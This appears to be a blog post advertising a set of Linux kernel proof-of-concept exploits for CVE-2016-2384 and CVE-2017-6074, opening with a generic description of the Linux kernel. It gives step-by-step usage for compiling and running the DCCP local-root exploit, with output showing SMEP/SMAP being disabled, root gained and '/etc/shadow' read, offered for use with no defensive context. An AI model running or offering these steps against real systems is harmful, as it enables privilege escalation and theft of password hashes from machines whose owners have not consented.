The Linux kernel is an open-source monolithic Unix-like computer operating system kernel. The Linux family of operating systems is based on this kernel and deployed on both traditional computer systems such as personal computers and servers, usually in the form of Linux distributions, and on various embedded devices such as routers, wireless access points, PBXes, set-top boxes, FTA receivers, smart TVs, PVRs, and NAS appliances. The Android operating system for tablet computers, smartphones, and smartwatches uses services provided by the Linux kernel to implement its functionality. While the adoption on desktop computers is low, Linux-based operating systems dominate nearly every other segment of computing, from mobile devices to mainframes. As of November 2017, all of the world's 500 most powerful supercomputers run Linux.
Proof of Concept :
Kernel Exploits is A bunch of proof-of-concept exploit for the Linux kernel.
Exploit Lists :
[ - ] CVE-2016-2384
This is a proof-of-concept exploit for the vulnerability in the usb-midi Linux kernel driver (CVE-2016-2384). Requires physical access to the machine.
[ - ] CVE-2017-6074
This is a proof-of-concept local root exploit for the vulnerability in the DCCP protocol implementation CVE-2017-6074. Includes a semireliable SMEP/SMAP bypass (the kernel might crash shorty after the exploit succeds).
Usage :
user@ubuntu:~$ git clone https://github.com/xairy/kernel-exploit(CVE-NUMBER)
user@ubuntu:~$ cd CVE-2017-6074
user@ubuntu:~$ gcc poc.c -o pwnd
user@ubuntu:~$ chmod +x pwnd
user@ubuntu:~$ ./pwnd
Processing ........
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x402043
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
# cat /etc/shadow
Post a Comment
Post a Comment